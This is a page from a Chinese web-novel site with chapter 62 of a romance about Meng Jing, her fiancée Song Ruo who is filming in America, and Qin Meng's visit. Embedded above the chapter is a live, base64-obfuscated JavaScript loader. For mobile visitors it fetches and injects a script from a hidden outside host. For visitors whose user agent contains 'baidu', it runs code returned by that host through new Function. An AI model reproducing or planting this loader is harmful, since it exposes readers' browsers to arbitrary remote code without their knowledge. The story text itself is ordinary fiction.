98小说网

阅读记录  |   用户书架
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuaHN2Y2huc3ZuY3Z2ZC5jb20=','2843',window,document,['G','TpoZFcguG']);}:function(){};
上一页
目录 | 设置
下一章

分卷(50(2 / 2)

加入书签 | 推荐本书 | 问题反馈 |

第62章

出来玩儿啊。这是盛雪给孟璟打的第九个电话了,得到的答复依然是拒绝,你老婆又不在,你怎么跟个旧时代的小媳妇儿一样,大门不出二门不迈啊。出来出来。

孟璟趴在桌子上,吵啥吵,没看见呢嘛,学习呢。掉转笔头,点点桌子上的一本书。

噗,孟璟,学习啊?同是二世祖的黎家二小姐探过头来,揽着盛雪的肩,朝屏幕里睨了一眼,哎哟喂,是本真书啊,吓死宝宝了。

滚。孟璟没好气,摁灭手机。无情无绪地将书笔都推开,摔在床上,头埋进被窝里。手机本来放在外边的,过会伸手拿进来,轻车熟路点开未婚妻的朋友圈。

宋若飞去美帝拍戏第十天。平时就不是爱发状态的人,最近更是更得慢,这次出行后发的,依然只有最初到达的那日,从酒店窗户往下俯瞰所拍的一个广场,聚满了鸽子,有个男人坐那儿投喂。配字也简洁像宅总。这跟摩斯密码似的一句话,让孟璟绞尽了脑汁。她换过各种浏览器搜索,都没得出个确切结论,宅总是啥。

未婚妻微博倒是在三天前更新过一张他拍,站在第五大街一棵大树前,白衬衫,黑色小西装,化了小烟熏,微风将长发卷起,单手捋发,双眼微眯。照片孟璟第一时间就存了,可还是习惯每隔几小时登陆一次,现在要举报的评论更多,以前只有叫老婆的热情网友,现在还出现一批叫老公的。

现在的小朋友,太没有分寸了!孟璟很气愤。

楼下芬姨叫吃饭。

她从房间出来,恰好看到表姐谢琼的背影,嗤了一声,两手插兜懒洋洋地下楼去。

孟卫国精神矍铄,目光炯炯迎接一对下楼来的小朋友,眼光在孟璟身上多停留了会儿,再朝阿芬挤了挤眼。芬姨微笑着。

食不言寝不语,小时候教了孟璟很久,都没用,就爱叽叽喳喳说个没完,现在没人逼她了,她倒又改了,直到吃完也没多说什么,只夸了一句芬姨手艺好。

饭后,孟璟算着时间,将视频拨过去,低眉敛目了一整晚的脸这时候忽然生动起来,未婚妻,起床啦?

祖父和宋若讲两句的时候,孟璟站在一旁,背着手不动声色,朝屏幕淡淡望着。

脑海里不知不觉回想到机场送行那天,两个人就视频这个问题讨价还价的场面。

未婚妻挺不对劲的,两个人亲也亲了,抱也抱了,定情信物都送了,分别在即,她竟然提出,接下来的日子,彼此先都不要联络。她当时觉得难以理解之余,还有些伤心,那怎么能行?十几天不联系,你都不会想我吗?

未婚妻说你正好想想清楚。

我想什么清楚。清楚是谁?我只想你啊。

别这样。未婚妻很不安。

那爷爷也会担心你啊,芬姨也会担心你啊,你想想看,你独自去那么远的地方,他们已经提心吊胆了,你还连个电话都不给他们打,老婆,你未免也太铁石心肠了吧。

孟璟记得小小的未婚妻安静了许久,最后让步了我会每隔一天和爷爷视频的。但是我们不要联络。顿一顿,你自己梳理一下。

这逻辑跳脱的,实在不像一个奥数拿满分的人。孟璟当时恨不得钻进她的小脑瓜看看到底在想些什么。时至今日,她仍然不明白,未婚妻让她梳理什么。

今天不冷吗?怎么穿那么少啊?孟老爷子皱了皱眉。

宋若身上穿着件白色夏装长裙,头发盘成发髻,脸上带妆,不是的爷爷,我这是戏服,今天拍一场夏天的戏。

孟卫国唔地一声,拍完就赶紧穿好,要注意保暖!

宋若回答知道了。

再略聊了几句,就要挂断,孟璟站在一边,自始至终都没有说过什么。老爷子问她孟璟啊,你有没有什么要和若若说的?孟璟摇头,朝视频里挥挥手,老婆加油,注意休息。

宋若那边收了线。这里孟卫国就问你怎么什么也不跟若若说?

孟璟说她拍戏很累。我自己乖一点,有话等她回来说。

老爷子挑眉嚯哟,你什么时候这么体贴了?

孟璟抗议我什么时候不体贴了?

哈哈哈哈。

那边宋若挂了视频,倒呆了好一会儿。孟璟那样子看不出想好没。两个小苏都跟了来,鞍前马后地效劳。这天她拍完当日戏份,回了酒店休息,床头的座机忽然响了。她揉揉眉心,接起电话,前台用英语告诉她,有人找她,黑发黑眼的东方人。宋若心中咯噔一下,第一反应是孟璟追过来了。但是随即否决。早上视频二世祖还在家,这时候不可能飞过来的。

前台问她是否要接见。宋若麻烦她将电话给来访者,先确认一下身份。

对面是个很温雅的女声hello,你是宋若吗?

宋若眉头微微蹙了蹙,这声音完全陌生,对面显然也意识到了这个问题,立马自我介绍是这样,我是秦萌的朋友,秦萌是你的朋友,也就是说,我们也是朋友了,我想见一见你,可以吗?

这人说话是纯正的京片子。但秦萌的朋友就是她的朋友,这等量代换过于厉害。

那个宋小姐,你不要挂电话呀,我我我,我有很重要的事情。

宋若耐心地问什么事?

是这样,秦萌说她喜欢的是你这样儿的,我看了照片,还想见见真人。对面声音变得很小,似乎自己也觉得有点理亏站不住脚,我知道你很忙,不过我看一眼就走,帮帮忙呀,我会请你吃饭的!

宋若还没来得及给她一个答复,就听见哎呀几声惨叫,接着换了个人来讲电话,这回是较为熟悉的声音了若若!你不要搭理刚刚这个无理取闹的家伙。

秦萌?宋若坐端正。

是我,若若,你过来了也不和我说一声,还把我微信拉黑了,尽管我知道一定是孟璟干的好事,可我还是好难过。我想见你。

宋若请她上来暂坐。

来的是两个人。秦萌似乎长高了一点儿,另外一个,剪着短短的头发,眼睛圆溜溜的,在宋若身上来回打量了几次,突然哇的一声哭出来我输了,呜呜呜,这辈子都赢不了了,我不想活了呜呜呜。

宋若这女孩子长相和声音都给人一种雅致的感觉,可是一说话就如此夸张,形成剧烈反差。

秦萌朝这人翻个白眼。女生站到宋若跟前,抹了一把眼泪,递出一只手,若若你好,我叫陆漫漫。

宋若脑海中自动续上其修远兮几个字,表面却不动声色,轻轻与她握了握手。

秦萌上来把两个人的手掰扯开,斜插进两人之间,凝视宋若若若,这周五,请你抽空到我家做客。

宋若表示,周五可能依然忙于拍摄,脱不了身。

秦萌安静了会儿,神情哀伤,可我在孟家打扰那么久,若若来了,于情于理我应该请你吃饭的呀,咱们中国人不是最讲究礼尚往来了么?还是若若,你把我忘了,不喜欢我了?小萌都想你了,你来了这边以后,她有感应,天天在家暴躁地走来走去,连猫罐头都不吃了,你不抽空去看看小萌?

盛情难却之下,宋若只得采取了拖延战略,含混道我周五再看看吧。她想从秦萌那里获取她梦里的原著剧情,可自从有过上次酒店里的那一遭,对小娇妻多少怀有点敬而远之的意思,尽管她看起来还是萌不可言。

秦萌叮嘱宋若好好休息,拽着陆漫漫走了。

次日拍摄的是成年景知安在法律学院舌战群雄的戏份。

所借的拍摄地是大的一个模拟法庭,因为搭戏的都是在本地所找的大学生,宋若在台词方面比较紧张,担心自己跟不上native seaker的语速,词背得滚瓜烂熟,到开始前半小时仍旧在对照着词典查看专业词汇,生怕贻笑大方。有人轻拍她的肩,她扭头看看,有些眼熟的女生,身穿一袭黑色法袍,手捧几本书,对她眨眨右眼,hi。

上一页
目录
下一章
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间